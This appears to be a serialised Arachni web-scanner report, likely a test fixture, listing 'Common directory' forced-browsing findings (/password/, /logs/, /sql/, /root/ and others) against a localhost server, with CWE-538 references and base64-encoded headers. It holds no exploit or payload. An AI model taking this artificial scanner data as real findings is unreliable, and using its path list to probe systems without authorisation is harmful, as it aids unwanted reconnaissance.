mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/password/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/password/ injected: password id: password elem: path remarks: {} method: '' response: password headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/jdbc/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/jdbc/ injected: jdbc id: jdbc elem: path remarks: {} method: '' response: jdbc headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/files/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/files/ injected: files id: files elem: path remarks: {} method: '' response: files headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/site/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/site/ injected: site id: site elem: path remarks: :stuff: - Blah - Blah2 method: '' response: site headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/sales/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/sales/ injected: sales id: sales elem: path remarks: {} method: '' response: sales headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/log/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/log/ injected: log id: log elem: path remarks: {} method: '' response: log headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/logs/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/logs/ injected: logs id: logs elem: path remarks: {} method: '' response: logs headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/login/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/login/ injected: login id: login elem: path remarks: {} method: '' response: login headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/logfile/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/logfile/ injected: logfile id: logfile elem: path remarks: {} method: '' response: logfile headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/logon/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/logon/ injected: logon id: logon elem: path remarks: {} method: '' response: logon headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/guests/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/guests/ injected: guests id: guests elem: path remarks: {} method: '' response: guests headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/root/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/root/ injected: root id: root elem: path remarks: {} method: '' response: root headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/htdocs/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/htdocs/ injected: htdocs id: htdocs elem: path remarks: {} method: '' response: htdocs headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/account/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/account/ injected: account id: account elem: path remarks: {} method: '' response: account headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/sql/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/sql/ injected: sql id: sql elem: path remarks: {} method: '' response: sql headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/file/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/file/ injected: file id: file elem: path remarks: {} method: '' response: file headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
